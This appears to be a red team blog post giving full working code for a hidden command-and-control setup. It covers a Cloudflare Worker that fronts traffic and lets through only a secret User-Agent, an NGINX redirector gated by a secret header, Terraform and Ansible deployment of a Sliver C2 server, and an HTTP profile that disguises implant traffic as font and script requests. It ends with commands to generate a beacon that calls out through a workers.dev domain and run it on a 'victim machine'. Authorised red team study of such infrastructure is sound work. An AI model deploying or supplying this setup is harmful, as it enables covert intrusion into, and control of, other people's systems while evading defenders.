# How to protect your C2 (or Yes, an another Red Team infrastructure blog)

By
Mr.NOODLE
In 
Published 2025-06-08

Hi everyone, it's been a while since my last blog post.

Now, i have more time and less excuses left to avoid writing blog post.

For this blog post, we will explore something new for me: the world of Red Team infrastructure I was strongly inspired by the excellent article from CGomezSec: Securing C2 for Red Team Operations using Cloudflare

# Introduction

To protect our C2, it's essential to avoid exposing it directly to the internet. Instead, you need to place servers in front of it as a protective layer.

(So we don't end up on Fox_threatintel's Twitter)

Typical non-redirector protecting the Threat Actor infrastructure
Typical non-redirector protecting the Threat Actor infrastructure

There are two main techniques to achieve this:

In this article, i'll show you how to set this up using Cloudflare Worker for the Domain Fronting part, and NGINX for the redirector part - all deployed and automated with Ansible & Terraform

# Configuration part

# Cloudflare Worker (Domain Fronting)

The goal of Domain Fronting is to use a CDN (Content Delivery Network) that is higly trusted by the target or victim.

For example, in this project, I'm using Cloudflare Workers. Cloudflare is a widely known and trusted CDN - many legitimate websites rely on it. That makes it much harder to block at a network level without risking false positives.

There, we'll use the CLI tool Wrangler to set up my Cloudflare Worker.

# Log in to CloudFlare
wrangler login
# Initialize a new Worker project
wrangler init rt-worker-infra

When you initialize the project, an instance is created right away and you can access it directly the provided link.

You should see a simple Hello World! by default:

Hello World Worker
Hello World Worker

To handle requests and control the behavior of the Worker, you need to edit the src/index.js file.

Here’s what it looks like after modification:

const SECRET_HEADER_NAME = "X-Worker-Auth";
const SECRET_HEADER_VALUE = "REDACTED" 

addEventListener("fetch", event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  const ua = request.headers.get("User-Agent") || "";

  const uniqueUA = "Mozilla/5.0 (Windows Nt 10.0; Win64; x64; rv:116.0) Gecko/20100101 Firefox/116.0";
  // Check if the User-Agent is corresponding to the """"secret"""" user-agent 
if (ua === uniqueUA) {
    // Extract only the path + query string
    const url = new URL(request.url);
    const pathAndQuery = url.pathname + url.search;

    // Build the new URL for the redirector
    const targetUrl = "https://cdn.blabla.net" + pathAndQuery;
    // Add the secret header in the request
    const headers = new Headers(request.headers);
    headers.set(SECRET_HEADER_NAME,SECRET_HEADER_VALUE);
    // Recreate the request with the correct URL
    const modifiedRequest = new Request(targetUrl, {
      method: request.method,
      headers: headers,
      body: request.body,
      redirect: "manual"
    });
    return fetch(modifiedRequest);
  }

  // If the header doesn’t match, the client is automatically redirected to Cloudflare’s website.
  return Response.redirect("https://www.cloudflare.com", 302);
}

# Redirector Setup

The redirector's primary job is to proxy traffic between the internet and the C2. Think of it as a bodyguard - nothing gets to the C2 without going through it first.

There are many ways to build a redirector:

Different redirector type
Different redirector type

In our case, we will use an NGINX server acting as a reverse proxy in front of our C2.

For our NGINX, we need to perform some checks on the request:

  1. All requests will hit the /cdn-update/ endpoint
  2. We need to check if the secret header added by the Worker is present in the request. If it is, we can proxy the request to our C2.
  3. If the condtion is not met, the client will be redirected to Cloudflare's website.
NGINX configuration
server {
    listen 80;
    server_name cdn.blabla.net;

    location /.well-known/acme-challenge/ {
        root /var/www/certbot;
    }

    location / {
        return 301 https://www.cloudflare.com$request_uri;
    }
}

server {
    listen 443 ssl;
    server_name cdn.blabla.net;

    ssl_certificate /etc/letsencrypt/live/cdn.blabla.net/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/cdn.blabla.net/privkey.pem;

    location /cdn-update/ {
        if ($http_x_worker_auth != "<REDACTED>") {
            return 301 https://www.cloudflare.com$request_uri;
        }
        proxy_pass http://{{ c2_ip }}:{{ c2_port }}/;
        proxy_set_header Host {{ c2_ip }};
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

    location / {
        return 301 https://www.cloudflare.com$request_uri;
    }
}

So finally there is a final graph of our infrastructure

C2 infrastructure
C2 infrastructure

# Deployment

To simplify the deployment and configuration of both the Redirector and the C2, I used Terraform and Ansible.

  • Terraform handles the provisioning of the infrastructure on DigitalOcean.
  • Ansible takes care of configuring both the C2 and the Redirector.

Much of this infrastructure setup draws from xbz0n’s detailed write‑up on C2 redirectors. His article covers everything from layered redirector design to practical NGINX implementations

# Why DigitalOcean ?

Because I'm broke and I had a free GitHub Education voucher to burn. (Moreover, I already had some exp with DO, and there's a great documentation available on how to use Terraform with their platform.)

# Terraform

We will need two machines for this setup:

  • The C2 server (we will use SliverC2 for the C2)
  • The Redirector server

However, there is a key constraint: The C2 must not be exposed to the internet - it should only be reachable locally, ideally via a private network (VPC) so it can communicate securely with the redirector.

vpc.tf
resource "digitalocean_vpc" "local_infra" {
    name = "red-team-local-fra1"
    region = "fra1"
    ip_range = "10.11.0.0/16"
}
c2.tf
resource "digitalocean_droplet" "c2" {
	name = "c2"
	image = "ubuntu-24-10-x64"
	region = "FRA1"
	size = "s-1vcpu-1gb"
	ssh_keys = [
		data.digitalocean_ssh_key.terraform.id
	]
	vpc_uuid = digitalocean_vpc.local_infra.id
}
redirector.tf
resource "digitalocean_droplet" "redirector" {
	name = "redirector"
	image = "ubuntu-24-10-x64"
	region = "FRA1"
	size = "s-1vcpu-1gb"
	ssh_keys = [
		data.digitalocean_ssh_key.terraform.id
	]
	vpc_uuid = digitalocean_vpc.local_infra.id
}

Now that the machines are deployed, we need to retrieve the internal and external IP addresses of both the C2 and the Redirector. To do that, we can simply use the following output configuration in output.tf:

output.tf
output "ansible_inventory" {
	value = <<EOT
		[c2]
			${digitalocean_droplet.c2.ipv4_address_private} ansible_user=root
	[redirector]
	${digitalocean_droplet.redirector.ipv4_address} ansible_user=root
	EOT
}

output "droplet_ips" {

	value = {
		c2 = digitalocean_droplet.c2.ipv4_address_private
		redirector = digitalocean_droplet.redirector.ipv4_address_private
	}
} 

Now that we have our Terraform files ready. We can deploy our environment using this following command:

terraform apply -var "do_token=${<Your DigitalOcean Token}" -var pvt_key="/home/noodle/.ssh/terraform"

If everything goes well, you will get the following output:

Terraform output
Terraform output

# Ansible

Once our droplets are up, we move on to the configuration part.

As you may have noticed above, the output.tf file formats the Terraform output so you can directly copy & paste it into your Ansible inventory.ini file.

To check if Ansible is ready to communicate with all the droplets, we can run the following command:

ansible -i inventory.ini all -m ping

Ansible callback
Ansible callback

# Redirector configuration

As you can see, Ansible supports the Jinja2 templating. I used it to dynamically replace {{ c2_ip }} with the internal ip address of the C2 on the NGINX configuration file

- name: Redirector configuration
  hosts: redirector
  become: true
  vars:
    c2_ip: "10.11.0.3"
    c2_port: 80
    redirector_domain: "cdn.blabla.net"
    cert_email: "random@example.com"
  tasks:
    - name: Update & Upgrade apt packages
      apt:
        upgrade: yes
        update_cache: yes

    - name: Install Nginx
      apt:
        name:
          - nginx
          - certbot
          - python3-certbot-nginx
        state: present

    - name: Deploy http-only Nginx configuration
      template:
        src: templates/nginx_redirector_http_only.conf.j2
        dest: /etc/nginx/sites-available/default
      notify: Restart Nginx

    - name: Obtain SSL certificate
      shell: >
        certbot --nginx -d {{ redirector_domain }} --non-interactive --agree-tos -m {{ cert_email }}
      args:
        creates: /etc/letsencrypt/live/{{ redirector_domain }}/fullchain.pem
    - name: Deploy true Nginx configuration
      template:
        src: templates/nginx_redirector.conf.j2
        dest: /etc/nginx/sites-available/default
      notify: Restart Nginx

    - name: Setup automatic certificate renewal
      cron:
        name: "Certbot renewal"
        job: "certbot renew --quiet --no-self-upgrade"
        special_time: daily

  handlers:
    - name: Restart Nginx
      service:
        name: nginx
        state: restarted

You can apply this configuration using this following command :

ansible-playbook -i inventory.ini playbook/redirector.yml

Ansible redirector
Ansible redirector

# C2 part

Here is the Ansible playbook used to deploy and configure Sliver

c2.yml
- name: "Sliver Installer"
  hosts: c2
  become: true
  vars:
    operator_name: "noodle"
    operator_lhost: "127.0.0.1"
  tasks:
    - name: Update and upgrade apt packages
      apt:
        upgrade: yes
        update_cache: yes
    - name: Install cURL
      apt:
        name: curl
        state: present
    - name: Install SliverC2 script
      get_url:
        url: https://sliver.sh/install
        dest: /tmp/sliver_install.sh
        mode: '0755'
    - name: Execute the installation script
      command: /tmp/sliver_install.sh
    - name: Create operator file
      command: >
        /root/sliver-server operator
        --name {{ operator_name }}
        --lhost {{ operator_lhost }}
        --save /root/{{ operator_name }}.cfg
    - name: Download the operator file
      ansible.builtin.fetch:
        src: /root/{{ operator_name }}.cfg
        dest: ./{{ operator_name }}.cfg
        flat: yes
    - name : Delete the operator file
      command: rm /root/{{ operator_name }}.cfg

    - name : Copy the HTTP C2 configuration
      copy:
        src: templates/http-c2.json
        dest: /root/.sliver/configs/http-c2.json
        owner: root
        group: root
        mode: '0644'
    - name : start sliver server daemon mode
      command: "/root/sliver-server daemon &"
      async: 45
      poll: 0

Ansible C2
Ansible C2

Thus, once the configuration is complete, we can use the downloaded .cfg operator file with the following command on your host:

mv noodle.cfg ~/.sliver-client/configs/

Since everything runs locally (from C2's perspective), we just need to forward the port locally and connect as usual:

ssh -L 31337:127.0.0.1:31337 root@C2_IP -i ~/.ssh/terraform

Sliver in local
Sliver in local

But here is the tricky part: we now need to make Sliver understand how our infra actually works. By default, it will try to make requests to the C2 - but our setup requires it to first pass through the Cloudflare Worker checks, then through the redirector.

Me when i want to test my payload
Me when i want to test my payload

After a fair bit of trial and error, I found out that we just need to provide Sliver with a proper http-c2.json profile. This profile defines the required path, the secret header added by the Worker, and the custom User-Agent expected.

Here is what that config looks like:

http-c2.json
{
  "implant_config": {
    "user_agent": "Mozilla/5.0 (Windows Nt 10.0; Win64; x64; rv:116.0) Gecko/20100101 Firefox/116.0",
    "chrome_base_version": 100,
    "macos_version": "10_15_7",
    "url_parameters": null,
    "headers": [
    ],
    "max_files": 8,
    "min_files": 2,
    "max_paths": 8,
    "min_paths": 2,
    "stager_file_ext": ".woff",
    "stager_files": [
      "attribute_text_w01_regular",
      "ZillaSlab-Regular.subset.bbc33fb47cf6",
      "ZillaSlab-Bold.subset.e96c15f68c68",
      "Inter-Regular",
      "Inter-Medium"
    ],
    "stager_paths": [
      "static",
      "assets",
      "fonts",
      "locales"
    ],
    "poll_file_ext": ".js",
    "poll_files": ["index"],
    "poll_paths": ["cdn-update"],
    "start_session_file_ext": ".html",
    "session_file_ext": ".php",
    "session_files": ["index"],
    "session_paths": ["cdn-update"],
    "close_file_ext": ".png",
    "close_files": ["favicon"],
    "close_paths": ["assets"]
  },
  "server_config": {
    "random_version_headers": false,
    "headers": [],
    "cookies": [
      "PHPSESSID",
      "SID",
      "SSID",
      "APISID",
      "csrf-state",
      "AWSALBCORS"
    ]
  }
}

# Proof of Concept (PoC)

Now that everything is up and running, lets generate a listener and a beacon to verify it works end-to-end

# Beacon generation

# Listener
sliver> http -L <IP_LOCAL_C2> --lport 80 --domain cdn.blabla.net
sliver> generate beacon --debug --http http://<REDACTED>-cloudflare.workers.dev/cdn-update --skip-symbols --disable-sgn --os linux --arch amd64

Now, execute the beacon on the victim machine, and check if the session connects properly:

Sliver beacon
Sliver beacon
Sliver sessions
Sliver sessions

Sliver factz
Sliver factz

# Conclusion

This project is like a small experiment for me to understand how to securely deploy a Red team C2 infrastructure - and I definitely learned a lot along the way.

That said, I'm still a beginner in this area, and this setup is far from perfect.

The goal wasn't to build a bulletproof production setup, but rather to get hands-on and explore the fundamentals.

After some reflection and feedback, I think it could be interresting to open source this project on Github and keep improving it with new features. So stay tuned, more to come 👀

If you have any feedback, questions, or suggestions - Im all ears

Feel free to reach out or contact me. I'm always happy to learn from others .

# Special thanks

  • Euz / NtDallas / Atsika (and to others who will recognize themselves 👀) for helping me with some questions and proofreading this article

# Ressources